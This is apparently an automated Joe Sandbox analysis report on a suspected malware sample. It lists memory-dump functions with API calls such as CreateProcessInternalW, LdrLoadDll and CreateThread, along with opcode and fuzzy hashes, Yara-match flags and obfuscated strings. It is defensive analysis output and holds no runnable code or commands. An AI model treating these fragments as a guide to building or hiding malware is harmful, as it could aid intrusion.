                                                  • Opcode ID: e37eb215d4545e015842ac9b30d1d112d216885dcb7a7bf4a4518c8f32e891e0
                                                  • Instruction ID: 4b40073c7f43581cbf6c807d81e21d30cf1f6371ae4136212396fe2ca2877ed3
                                                  • Opcode Fuzzy Hash: e37eb215d4545e015842ac9b30d1d112d216885dcb7a7bf4a4518c8f32e891e0
                                                  • Instruction Fuzzy Hash: BB90023124140813D111B1584504707100D87D1281F96C413A0424558D975A8A62A131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d8f72902afa5b0ffd31079e8f014f187157e0ac7212b5f7fea01f95f8a8077c0
                                                  • Instruction ID: 15cab85e065479e740ac9ec812e1f1576a377257153bcc594f570037046a771d
                                                  • Opcode Fuzzy Hash: d8f72902afa5b0ffd31079e8f014f187157e0ac7212b5f7fea01f95f8a8077c0
                                                  • Instruction Fuzzy Hash: B4900221282445535545F1584404507500A97E1281796C013A1414950C872A9966D631
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e5f9f12fd099ab7248f072103f103d3c80423780a742d1c9d09ba03dc4c891bd
                                                  • Instruction ID: c4d9481cb4b26036c8420e3025b6be3885a630ba848e0fbaaad8ca6f59b60873
                                                  • Opcode Fuzzy Hash: e5f9f12fd099ab7248f072103f103d3c80423780a742d1c9d09ba03dc4c891bd
                                                  • Instruction Fuzzy Hash: 9D90022134140403D140B15854186065009D7E2341F56D012E0414554CDB1989665232
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 069106a2e8f74ae9128da1535b43de6bc4c7b7a4b134cfe4db463e0915b8ef83
                                                  • Instruction ID: 6cf76e9f6a8b6be9d3059645008b18d87559eea147a0470aa9d2fc94afdc250d
                                                  • Opcode Fuzzy Hash: 069106a2e8f74ae9128da1535b43de6bc4c7b7a4b134cfe4db463e0915b8ef83
                                                  • Instruction Fuzzy Hash: 0990022925340403D180B158540860A100987D2242F96D416A0015558CCB1989795331
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a38e382c49a3818c706e653ad7a237aaf083980dd7c0e0f3439c7464105216e5
                                                  • Instruction ID: e4c01294addcd2f5d938f6f1a9a74cf5a51b50e2e95838075443f5386edfe1b0
                                                  • Opcode Fuzzy Hash: a38e382c49a3818c706e653ad7a237aaf083980dd7c0e0f3439c7464105216e5
                                                  • Instruction Fuzzy Hash: 8190023124140803D100B5985408646100987E1341F56D012A5024555EC76989A16131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fe7762054fc68b1fadd85f7bffe4db22e4338326f5e19c7b69b075790737a664
                                                  • Instruction ID: 907fbc18e49792bd49f0fd96a127d32374fe2ca138fd573b45c342bdbba6d67f
                                                  • Opcode Fuzzy Hash: fe7762054fc68b1fadd85f7bffe4db22e4338326f5e19c7b69b075790737a664
                                                  • Instruction Fuzzy Hash: DB90023124140C43D100B1584404B46100987E1341F56C017A0124654D8719C9617531
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c103e1c95c634ac117d68557c20c9e9890f072cf722b438be18e40d1556ce903
                                                  • Instruction ID: 5077fe3f1b8bcbfa975c2ab9abaa8254f632b0d725dff1006e10d4b862f79658
                                                  • Opcode Fuzzy Hash: c103e1c95c634ac117d68557c20c9e9890f072cf722b438be18e40d1556ce903
                                                  • Instruction Fuzzy Hash: 5E90023124148C03D110B158840474A100987D1341F5AC412A4424658D879989A17131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 636d00b2ea61ac436f2d84b51007764b589a77f3d4598a91a51dfc120f5286ce
                                                  • Instruction ID: 3dda91a830b113f5488ef4ef54803d577ace784bf2be1e90f047e7401f92c685
                                                  • Opcode Fuzzy Hash: 636d00b2ea61ac436f2d84b51007764b589a77f3d4598a91a51dfc120f5286ce
                                                  • Instruction Fuzzy Hash: EE90023164550803D100B1584514706200987D1241F66C412A0424568D87998A6165B2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5ab6d8be2eabd14dc16ab70091695b5fcef8692b31bc017ac03d940de71c293f
                                                  • Instruction ID: 7c2715a11510bed2be1de98e97320b33c5d296f1ab45f4986e6f933baa09d7ee
                                                  • Opcode Fuzzy Hash: 5ab6d8be2eabd14dc16ab70091695b5fcef8692b31bc017ac03d940de71c293f
                                                  • Instruction Fuzzy Hash: 1390022128545503D150B15C44046165009A7E1241F56C022A0814594D875989656231

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(04j58b6g,00000111,00000000,00000000), ref: 02F21207
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 04j58b6g$04j58b6g
                                                  • API String ID: 1836367815-1473487654
                                                  • Opcode ID: 4d559a0359785ef043c7fdf27358d6973d777785fa695847fc44dd91c61b4ca6
                                                  • Instruction ID: 7e0c96e94a39e25bacd21fd23fde5714941c9d85505a060af3d576dda43f816f
                                                  • Opcode Fuzzy Hash: 4d559a0359785ef043c7fdf27358d6973d777785fa695847fc44dd91c61b4ca6
                                                  • Instruction Fuzzy Hash: 0401A1B2D4015C7AEB11AAE08C81EAFBB7CDF456D4F448064FB04B7141D6385E068FB1
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02F33FCB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 333ccd0d9a02bc7922b41c995fe11edfdb5ff538081fd9e8598c3d51ccbec43e
                                                  • Instruction ID: 12e8d3b8e3aa43e1b769b59ef5589218b53ad570cd404d8f3d9cef6a901c3d00
                                                  • Opcode Fuzzy Hash: 333ccd0d9a02bc7922b41c995fe11edfdb5ff538081fd9e8598c3d51ccbec43e
                                                  • Instruction Fuzzy Hash: 9F316CB1A00605BBD714DFA4CC80FEBBBB9EB88754F408519EA59AB240D774A641CFA4
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  • Opcode ID: 0b2493c92734e94cf213e34ee60e01d3bf3aab567332331d5ae2450583b84ed9
                                                  • Instruction ID: 8485400bcbaa63360fa145361c06b3685f05408de61ff2991ee7853eb7c96bef
                                                  • Opcode Fuzzy Hash: 0b2493c92734e94cf213e34ee60e01d3bf3aab567332331d5ae2450583b84ed9
                                                  • Instruction Fuzzy Hash: 26314175A1060A9FDB00DFD8CC809EEB3B9FF89344B108559EA05EB214D775EE458FA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  • Opcode ID: 2fb6afce97908e57e0bfaecf505a1be892034cb446284fc49986d1fc85733d4d
                                                  • Instruction ID: dc7b6ab44e27775d463ae726b8b9667284ffc3a5e4617fc4a8bc17bcef539226
                                                  • Opcode Fuzzy Hash: 2fb6afce97908e57e0bfaecf505a1be892034cb446284fc49986d1fc85733d4d
                                                  • Instruction Fuzzy Hash: 64313EB5A1020AAFDB00DFD8CC809EEB3B9BF89344B108559E605AB214D775AE058BA0
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02F22130,02F3842F,02F35AEF,02F220F3), ref: 02F285A3
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: d0c1a2b90ba7b94e67928ad22dc50c34df3b36ef6988a2b01ccd70716958c46c
                                                  • Instruction ID: b570f9238ae5fc07caef03468ecf0259f7ead992358768c101f9db348a822baf
                                                  • Opcode Fuzzy Hash: d0c1a2b90ba7b94e67928ad22dc50c34df3b36ef6988a2b01ccd70716958c46c
                                                  • Instruction Fuzzy Hash: DC112BB2A002096BEB10EBA0CC46FAE736EDF417D4F044195FA0CD7240E635A6558FA5
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94c3acd1404e3ac41a401a3e3749ea832e792f61c3eb341312345c91ddf02113
                                                  • Instruction ID: 9a208ff6f120c60f58f29f00f8340826384cde615e88ecb3af290747c28b3ae3
                                                  • Opcode Fuzzy Hash: 94c3acd1404e3ac41a401a3e3749ea832e792f61c3eb341312345c91ddf02113
                                                  • Instruction Fuzzy Hash: 3E016476D0422A9FCB10CA64DC01B99B778AB01308F109396DA14EB1D1E732A708CF81
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F249D2
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 48ab1b02f76b4286e600ee140c75f391b1edbd132e6c29f50dcfdbfcfb951f3c
                                                  • Instruction ID: 7914879374b4ef9b41b9b3a2bce9570d7fd86b7b0c8cd1e1bbaa5c70e099cfc6
                                                  • Opcode Fuzzy Hash: 48ab1b02f76b4286e600ee140c75f391b1edbd132e6c29f50dcfdbfcfb951f3c
                                                  • Instruction Fuzzy Hash: 56011EB5D0020DABDF10EAE4DC45F9DB3B9AB44348F004195EA08A7240F671E758CB91
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02F2873E,00000010,?,?,?,00000044,?,00000010,02F2873E,?,?,?), ref: 02F39DD3
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 66b926dc92124afd770d4fb538d12e6d1c9040ff0f8efd374a8c126eb438ebd8
                                                  • Instruction ID: 30055319b4c0cb88694dbf4f6aa5f63108b44090df7fc634785b2c912fde1795
                                                  • Opcode Fuzzy Hash: 66b926dc92124afd770d4fb538d12e6d1c9040ff0f8efd374a8c126eb438ebd8
                                                  • Instruction Fuzzy Hash: 830196B2214108BBCB44DF99DC81EDB77ADAF8D754F518209FA0DE3240D630F8518BA4
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F19F75
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 02ac4702ac0486a94470d026d818424c75b5f386867ac899150418cbf3434beb
                                                  • Instruction ID: c66637ef0d7a287bf5ba303a9e3fc03af3dfe1412f474cc1df28e4b8199d7e57
                                                  • Opcode Fuzzy Hash: 02ac4702ac0486a94470d026d818424c75b5f386867ac899150418cbf3434beb
                                                  • Instruction Fuzzy Hash: 1AF0657338020436E22061AA9C02FD7768DDBC1BA1F540026F74CEB1C0D992B40146F9
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F19F75
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: b9a48a58cbe29ca5f168dd6efb5bc3cd5b8697d617e552ed2e1bfe66157af351
                                                  • Instruction ID: dbf695d6ae0ae06a1bf63f8bfa96648e8970d5dbc33dc1702cff295c8310532c
                                                  • Opcode Fuzzy Hash: b9a48a58cbe29ca5f168dd6efb5bc3cd5b8697d617e552ed2e1bfe66157af351
                                                  • Instruction Fuzzy Hash: 87F06D7338060476E23166A58D02FA7729D9FC1B91F640029F749EB1C4D9A1B8018BF8
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,6079BA58,00000007,00000000,00000004,00000000,02F241D9,000000F4), ref: 02F39D1C
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 401d47821f965699dd63a83745b895c0a75c9a127d47d5ce68e2a1e8a41c987f
                                                  • Instruction ID: 935c497598fea25e6fb63ffa4dd97d85de7595bef6594b994cfb28ff93a3d589
                                                  • Opcode Fuzzy Hash: 401d47821f965699dd63a83745b895c0a75c9a127d47d5ce68e2a1e8a41c987f
                                                  • Instruction Fuzzy Hash: 69E065B2204208BBDA10EF69DC41FEB77ADEF89764F004408FA09A7241CA30B9108BB4
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(02F21E29,?,02F3637B,02F21E29,02F35AEF,02F3637B,?,02F21E29,02F35AEF,00001000,?,?,00000000), ref: 02F39CCF
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: c88b1a0bb204b57714c7453da61102d5602c15304a95a44d83d0ecd5ecf1501f
                                                  • Instruction ID: 5dd4c535a7786e2b672883f1f38562f0a9e81b1b10c2406001a2bdfd784c408e
                                                  • Opcode Fuzzy Hash: c88b1a0bb204b57714c7453da61102d5602c15304a95a44d83d0ecd5ecf1501f
                                                  • Instruction Fuzzy Hash: 5CE092712002087BD614EF99DC81FEB77ADEFC9750F408409FA09A7241C630B8118BB4
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02F287AC
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: e027f13c8647ed12a0c2de91332cca65f87f01b913e18d530eaa2570d4e78633
                                                  • Instruction ID: bddcded25be04dc8bb5052c70a1ad6060d4ebd3d3e8a2741f7707e545cf6bc00
                                                  • Opcode Fuzzy Hash: e027f13c8647ed12a0c2de91332cca65f87f01b913e18d530eaa2570d4e78633
                                                  • Instruction Fuzzy Hash: 61E0207764020C17FB205978DC41F66334D5B457F4F444560BA5CCB3C1D674F40141A4
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02F287AC
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 1f0eaba26c31b482707b5ab1b2d4073edd86fa1175d81832f6027ded0892af05
                                                  • Instruction ID: ccc5214ed6ada7a41a63284721715bb543830354ab9b76545ab38753287b5d8d
                                                  • Opcode Fuzzy Hash: 1f0eaba26c31b482707b5ab1b2d4073edd86fa1175d81832f6027ded0892af05
                                                  • Instruction Fuzzy Hash: 5CE0267660020827EB206A68CC45F65331A9B49BE4F044220BA688F3C1D674E50142A0
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02F22130,02F3842F,02F35AEF,02F220F3), ref: 02F285A3
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 06e8d269ffcccdb1cdd4394e1e25fcb515861be1be409fa90676cb8ea57ba665
                                                  • Instruction ID: dcb1610a9f940b53cf7a6481ee4004991d9730b0c4ce1478a1dc839f692bde76
                                                  • Opcode Fuzzy Hash: 06e8d269ffcccdb1cdd4394e1e25fcb515861be1be409fa90676cb8ea57ba665
                                                  • Instruction Fuzzy Hash: 34D05EB27802083FF600A6E5CD07F17328E9B81BA4F458074BB4CDB2C2ED65F5108AA9
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5ab406e2194bb2a72822a5a571f1ad70cae971fdd44ad38b7234b4a93615e01d
                                                  • Instruction ID: 6fb26ce64d549805cc042a950676fde3cfbeb7f99f4d927309c4297d2e817c69
                                                  • Opcode Fuzzy Hash: 5ab406e2194bb2a72822a5a571f1ad70cae971fdd44ad38b7234b4a93615e01d
                                                  • Instruction Fuzzy Hash: 8DB09B719415C5C6DA11E760560C717790467D1741F1AC477D2030685E473DC5D1E175
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 191a13ac563c5d9ae68d09c55ad25af364b7420f143db68123678e910556c58f
                                                  • Instruction ID: 20befb5bf91b408c92a4868ea7946094185cc5d2081051cb5165cf9df7a7df95
                                                  • Opcode Fuzzy Hash: 191a13ac563c5d9ae68d09c55ad25af364b7420f143db68123678e910556c58f
                                                  • Instruction Fuzzy Hash: 52412374A1CB1D4FD368EFA9908167AF7E2FB89300F50052DC98AC7652EB74E8068785
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: afb2f7a62eaffebea4cd76346b02a82bd0f0b410fd3d1982c479d3e8b9504567
                                                  • Instruction ID: db4ced198c06e03a98fe2f3c0f6e38ab4894814b4e40613747057b090a30d63c
                                                  • Opcode Fuzzy Hash: afb2f7a62eaffebea4cd76346b02a82bd0f0b410fd3d1982c479d3e8b9504567
                                                  • Instruction Fuzzy Hash: 6FC08C26FA944401C2202C2E36011B8E3B58387222F4C32F3DC08E7100D407C063409A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3558027158
                                                  • Opcode ID: fb4eb57a1e8893358f89ff380ec2e0a03c4fb859cb87b5949ed8677b6e0ac51a
                                                  • Instruction ID: 3a85f18e9f40b35016dd9af85d6869ff2e4f60485817f1efee50da84fe2f32f2
                                                  • Opcode Fuzzy Hash: fb4eb57a1e8893358f89ff380ec2e0a03c4fb859cb87b5949ed8677b6e0ac51a
                                                  • Instruction Fuzzy Hash: 01A152F04083948AC7198F58A0652AFFFB1EBC6305F15816DE6E6BB243C37E8915CB95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !4qu$#n%z$%(6 $(6/$+#i%$4quy$4yhh$72#i$7plu$`ut#$`ut4$htq{$i%(6$lqwv$lut3$l}`l$qwv7$q{yl$t4yh$tq{y$v7`p$v}|5$yhht$ylqw$ynq~$}7yh$}`{p$}zh4
                                                  • API String ID: 0-2891600505
                                                  • Opcode ID: 764e8b0d09f2be2ba425e450fdd14cf36ad1bb611a154b097324cb81a7885ae2
